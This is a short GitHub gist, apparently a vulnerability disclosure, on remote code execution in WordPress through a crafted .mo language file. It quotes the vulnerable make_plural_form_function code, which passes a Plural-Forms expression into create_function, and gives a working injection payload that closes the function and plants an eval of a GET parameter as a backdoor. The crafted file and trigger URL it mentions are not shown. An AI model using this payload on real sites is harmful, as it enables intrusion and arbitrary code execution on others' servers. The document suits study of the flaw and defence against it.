Skip to content

Instantly share code, notes, and snippets.

/.md Secret

Created Oct 8, 2016
What would you like to do?
WordPress RCE via specially crafted .mo language file

WordPress RCE via specially crafted .mo language file

The vulnerability code in wp-includes/pomo/translations.php:

  function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);

PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use } close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)


Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.


The crafted .mo language file:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment